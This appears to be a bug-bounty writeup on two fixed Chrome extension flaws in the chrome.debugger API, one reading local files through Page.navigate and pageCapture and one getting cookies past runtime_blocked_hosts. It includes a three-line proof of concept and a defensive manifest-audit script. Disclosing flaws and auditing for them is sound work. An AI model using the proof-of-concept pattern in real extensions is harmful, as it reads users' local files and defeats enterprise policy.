Writeups

The Chrome extension chrome.debugger API (https://developer.chrome.com/docs/extensions/reference/api/debugger) implies the <all_urls> permission, but it should not grant access to the user's file system or bypass enterprise policies.
However, it is a very powerful protocol by design, with lots of features: https://chromedevtools.github.io/devtools-protocol/

‘Page.navigate’ could navigate iframes to file:// when not enabled (Awarded $3000)

Extensions with both the pageCapture and debugger permissions could read local file contents. This is because it was possible to use Page.navigate to navigate an iframe to file:// when “Allow access to file URLs” is disabled, exposing the file's contents to the pageCapture API.

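// Attach the debugger to the target tab (protocol version 1.3).
chrome.debugger.attach({tabId: <TARGET>}, '1.3', console.log);
// Navigate a child frame to a file:// URL; the frame ID is taken from debugger events.
chrome.debugger.sendCommand({tabId: <TARGET>}, 'Page.navigate', {frameId: <FRAME ID AS SEEN FROM EVENTS>, url: 'file:///d:/demo.txt'}, console.log);
// Capture the tab, including the navigated frame, as MHTML.
chrome.pageCapture.saveAsMHTML({tabId: 800972627}, console.log);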

This issue was fixed in https://issues.chromium.org/40060173

Features bypass the runtime_blocked_hosts cookie protection (Awarded $3000)

Extensions were able to get cookies from a runtime_blocked_host using the chrome.debugger API via Storage.getCookies (https://chromedevtools.github.io/devtools-protocol/tot/Storage/#method-getCookies) and other protocol features.
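
A defender-side check for the two reports above, as an added example that is not part of the original writeup: it audits installed extension manifests against an ExtensionSettings policy and flags extensions that hold debugger, alone, together with pageCapture, or where the policy relies on runtime_blocked_hosts without listing debugger in blocked_permissions. The extension IDs, manifests and policy value are constructed, and layering a per-ID entry over the "*" default is a simplifying assumption of this example.

```javascript
// Added example (Node.js). All IDs, manifests and the policy are constructed.
const ID_A = 'a'.repeat(32), ID_B = 'b'.repeat(32), ID_C = 'c'.repeat(32);

const policy = {                       // constructed ExtensionSettings value
  '*': { runtime_blocked_hosts: ['*://*.corp.example'] },
  [ID_B]: { blocked_permissions: ['debugger'] },
};
const installed = {                    // constructed manifest excerpts
  [ID_A]: { name: 'Capture helper', permissions: ['debugger', 'pageCapture'] },
  [ID_B]: { name: 'Inspector', optional_permissions: ['debugger'] },
  [ID_C]: { name: 'Notes', permissions: ['storage'] },
};

// True if the manifest declares the permission as required or optional.
const hasPerm = (m, name) =>
  [...(m.permissions || []), ...(m.optional_permissions || [])].includes(name);

// Assumption of this example: a per-ID entry is layered over the "*" default.
const effectiveSettings = (pol, id) => ({ ...(pol['*'] || {}), ...(pol[id] || {}) });

function auditExtension(id, manifest, pol) {
  const s = effectiveSettings(pol, id);
  const blocked = new Set(s.blocked_permissions || []);
  const findings = [];
  // An extension whose debugger permission is policy-blocked is out of scope.
  if (!hasPerm(manifest, 'debugger') || blocked.has('debugger')) return findings;
  findings.push('debugger: implies <all_urls> via the DevTools protocol');
  if (hasPerm(manifest, 'pageCapture') && !blocked.has('pageCapture'))
    findings.push('debugger+pageCapture: combination from the file:// report');
  if ((s.runtime_blocked_hosts || []).length > 0)
    findings.push('runtime_blocked_hosts set, but debugger not in blocked_permissions');
  return findings;
}

// Returns { extensionId: [findings] } for every extension with findings.
function auditAll(exts, pol) {
  const report = {};
  for (const [id, manifest] of Object.entries(exts)) {
    const f = auditExtension(id, manifest, pol);
    if (f.length) report[id] = f;
  }
  return report;
}

console.log(JSON.stringify(auditAll(installed, policy), null, 2));
```
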

Setup

Exploit

Using a browser extension with the debugger permission.